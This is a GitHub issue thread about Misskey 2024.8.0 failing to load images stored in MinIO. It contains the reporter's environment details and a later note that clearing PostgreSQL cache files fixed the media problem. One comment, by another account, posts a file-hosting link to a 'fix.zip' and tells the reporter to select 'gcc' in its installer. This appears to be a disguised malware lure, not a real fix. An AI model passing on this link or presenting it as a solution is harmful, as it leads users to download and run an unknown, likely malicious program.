### ISSUE TITLE
The image cannot be load(Object Storage)

### ISSUE THREAD

**Issue by wahsjh** [syuilo/Misskey#14459]
### 💡 Summary

use minio，file exist，but cannot be load

### 🥰 Expected Behavior

media can be load

### 🤬 Actual Behavior

、
![屏幕截图 2024-08-25 155326](https://github.com/user-attachments/assets/07d951f8-1259-4fa7-9300-317cc0b55e56)
I cant find problem in log
![image](https://github.com/user-attachments/assets/8f371620-2ab0-4c24-8898-5acb75dfc3ba)
use minio ，file exist
![屏幕截图 2024-08-25 155441](https://github.com/user-attachments/assets/784b6e29-9cfc-420e-abef-1b4991ea310e)
here is my config
![image](https://github.com/user-attachments/assets/67e2023e-3ebf-4b16-b78b-d2b740ef1dcf)

### 📝 Steps to Reproduce

1.use minio as object storage
2.upload any media
3.check the media

### 💻 Frontend Environment

```markdown
* Model and OS of the device(s):Windows 11 23H2
* Browser:chrome 127.0.6533.122
* Server URL: Run locally 
* Misskey:2024.8.0
```

### 🛰 Backend Environment (for server admin)

```markdown
* Installation Method or Hosting Service:docker compose
* Misskey:2024.8.0
* Node:20-bullseye-slim
* PostgreSQL:15-alpine
* Redis:7-alpine
* OS and Architecture:debian:11-slim
```

### Do you want to address this bug yourself?

- [ ] Yes, I will patch the bug myself and send a pull request

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by wahsjh** [comment]
> 下载 https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file 在安装程序菜单中，选择“gcc”。

这个下不了
![image](https://github.com/user-attachments/assets/e8dc159c-4096-4a50-95be-711b37e2e504)

**Comment by wahsjh** [comment]
看了下前端请求，发现是PostgreSQL的缓存文件的原因，清理重新搭建之后media没问题了，但是不能上传头像
